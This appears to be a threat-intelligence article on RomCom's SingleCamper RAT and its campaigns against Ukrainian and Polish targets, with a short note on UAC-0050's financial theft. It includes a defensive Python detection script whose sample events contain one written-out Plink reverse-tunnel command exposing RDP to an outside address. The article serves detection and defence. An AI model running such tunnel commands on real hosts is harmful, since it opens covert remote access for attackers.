SingleCamper RAT
The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023.
The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0). Infosec researchers are monitoring the activity cluster under the moniker UAT-5647. This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader.
This Threat Actor Has Launched Numerous Attack Campaigns
RomCom, also known by aliases such as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has been involved in various cyber operations since its emergence in 2022. These operations include ransomware attacks, extortion schemes, and the targeted collection of credentials.
Recent assessments indicate a noticeable increase in their attack frequency, with a focus on establishing long-term access to compromised networks and extracting valuable data, pointing to an espionage-driven agenda.
In support of this, RomCom is reportedly expanding its toolkit and infrastructure, incorporating a wide range of malware components built using multiple programming languages and platforms, including C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).
Spear-phishing Tactics to Compromise the Targets
The attack sequences begin with a spear-phishing email that delivers a downloader, which may be written in either C++ (MeltingClaw) or Rust (RustyClaw). This downloader is responsible for deploying the ShadyHammock and DustyHammock backdoors, while a decoy document is displayed to the recipient to maintain the deception.
DustyHammock is designed to communicate with a Command-and-Control (C2) server, execute arbitrary commands, and download files from it. In contrast, ShadyHammock functions as a platform for launching SingleCamper and monitoring incoming commands.
Despite the additional capabilities of ShadyHammock, it is considered a predecessor to DustyHammock, as the latter has been detected in attacks as recently as September 2024.
The SingleCamper RAT is the Latest Iteration
SingleCamper, the latest iteration of the RomCom RAT, is designed for various post-compromise activities. These activities include downloading the Plink tool from PuTTY to create remote tunnels with adversary-controlled infrastructure, conducting network reconnaissance, facilitating lateral movement, discovering users and systems, and exfiltrating data.
This particular series of attacks, aimed at high-profile Ukrainian entities, appears to align with UAT-5647's two-fold strategy: to establish long-term access and extract data for extended periods to support espionage goals and potentially pivot to ransomware deployment to disrupt operations and gain financially from the compromise.
Additionally, it is likely that Polish entities were also targeted, as indicated by the keyboard language checks conducted by the malware.
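Two behaviours in this section lend themselves to host-based detection: the Plink tunnels described above, and the loopback channel between SingleCamper and its loader noted earlier. The following is an added example of such detection logic, not RomCom tooling or vendor code; the event format, allow list, file paths and addresses are constructed assumptions, not indicators from the campaign.

```python
import re
from ipaddress import ip_address

# Constructed sample events in a simplified "EventID|Image|Detail" shape
# (Detail = command line for event 1, "dst_ip:dst_port" for event 3).
# These lines are illustrative, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    "1|C:\\Windows\\System32\\notepad.exe|notepad.exe report.docx",
    "1|C:\\Users\\Public\\plink.exe|plink.exe -N -R 8443:127.0.0.1:3389 -pw x op@203.0.113.10",
    "3|C:\\Windows\\System32\\svchost.exe|10.0.0.5:443",
    "3|C:\\Users\\Public\\loader.exe|127.0.0.1:4444",
]

# Processes expected to talk to loopback on a typical host (assumption; tune per estate).
LOOPBACK_ALLOWLIST = {"svchost.exe", "lsass.exe", "chrome.exe"}

# Plink/SSH port-forward spec "[bind:]port:host:port" that follows -R or -L.
FORWARD_SPEC = re.compile(r"^(?:[\w.\-]+:)?\d+:[\w.\-]+:\d+$")

def parse_event(line):
    event_id, image, detail = line.split("|", 2)
    return {"id": int(event_id), "image": image, "detail": detail}

def is_plink_tunnel(cmdline):
    """True when a command line requests an SSH port forward (-R/-L).
    Matching the flags rather than the binary name also catches a renamed plink.exe."""
    args = cmdline.split()
    for i, arg in enumerate(args):
        if arg in ("-R", "-L") and i + 1 < len(args) and FORWARD_SPEC.match(args[i + 1]):
            return True
    return False

def is_unexpected_loopback(image, dest):
    """True for a connection to 127.0.0.0/8 from a process outside the allow list."""
    host, _, _port = dest.rpartition(":")
    try:
        if not ip_address(host).is_loopback:
            return False
    except ValueError:
        return False
    return image.rsplit("\\", 1)[-1].lower() not in LOOPBACK_ALLOWLIST

def triage(lines):
    """Return (rule, image) pairs for every event that matches a rule."""
    hits = []
    for ev in map(parse_event, lines):
        if ev["id"] == 1 and is_plink_tunnel(ev["detail"]):
            hits.append(("plink_tunnel", ev["image"]))
        elif ev["id"] == 3 and is_unexpected_loopback(ev["image"], ev["detail"]):
            hits.append(("unexpected_loopback", ev["image"]))
    return hits

if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

Loopback traffic is noisy on real hosts, so the allow list should be built from a baseline of the environment before this rule is used for alerting rather than hunting.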
Ukraine Remains the Target of Sophisticated Malware Attacks
The announcement follows a warning from the Computer Emergency Response Team of Ukraine (CERT-UA) regarding cyberattacks conducted by a threat actor known as UAC-0050, who is targeting sensitive information and funds using various malware families, including the Remcos RAT, the SectopRAT, the Xeno RAT, the Lumma Stealer, the Mars Stealer and the Meduza Stealer.
UAC-0050's financial theft operations focus on stealing funds from Ukrainian businesses and private entrepreneurs. This is achieved by gaining unauthorized access to accountants' computers through remote control tools like Remcos and TEKTONITRMS.
Between September and October 2024, UAC-0050 executed at least 30 such attacks, which involved creating fake financial transactions through remote banking systems, with amounts ranging from tens of thousands to several million UAH.
Additionally, CERT-UA has reported observing attempts to spread fraudulent messages via the @reserveplusbot account on the Telegram messaging platform, aiming to deploy the Meduza Stealer malware under the guise of installing special software.
Aliases
2 security vendors flagged this file as malicious.
| Anti-Virus Software | Detection |
|---|---|
| - | RomCom 5.0 |
| - | SnipBot |